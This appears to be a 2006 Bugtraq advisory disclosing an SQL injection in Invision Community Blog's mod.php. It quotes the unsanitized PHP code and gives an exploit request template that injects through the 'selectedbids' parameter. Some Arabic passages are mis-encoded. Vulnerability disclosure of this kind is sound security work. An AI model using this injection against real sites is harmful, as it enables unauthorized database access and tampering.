[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Invision Community Blog .. Bugs

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Invision Community Blog .. Bugs
From: o.y.6@xxxxxxxxxxx
Date: 5 May 2006 08:34:13 -0000

[LEFT]
Invision Community Blog .. Bugs

SQL Injection :-

    Filename      :- mod.php
    Function name :- do_mmod()

The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection -->
* Arabic *
[/LEFT]
[RIGHT]
ÇáãÊÛíÑ $ids ÛíÑ ãÝáÊÑ Úä ØÑíÞ ÇáÏÇáå intval æåæ ÈÔßá ãÕÝæÝå .. áåÐÇ ÇáÓÈÈ ããßä 
Úãá ÷ÍÞäå
[/RIGHT]
[LEFT]
[php]
$ids = array();
$ids = explode( ',', $this->ipsclass->input['selectedbids'] );

...

$ids = implode( ',', $ids );

...

$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 1 ), 
"blog_id IN ({$ids})" );
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' 
=> 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );
$this->ipsclass->DB->simple_exec();

....

$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 0 ), 
"blog_id IN ({$ids})");
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' 
=> 'blog_blogs', 'where' => "blog_id IN ({$ids})" ) );

....

[/php]
[/LEFT]
[RIGHT]
*ÇáÇÓÊÛáÇá*
[/RIGHT]
[LEFT]
Exploit :-

    GET ^
        /IBP/index.php?
    POST ^
        
automodule=blog&req=blogmmod&auth_key=[auth_key]&selectedbids=-1,-1)[SQL]&blogact=unpin
[/LEFT]

Prev by Date: Re: ISA Server 2004 Log Manipulation
Next by Date: Re: WebCalendar User Account Enumeration Weakness
Previous by thread: SaPHPLesson 3.0 Multbugs
Next by thread: Re: Invision Community Blog .. Bugs
Index(es):
- Date
- Thread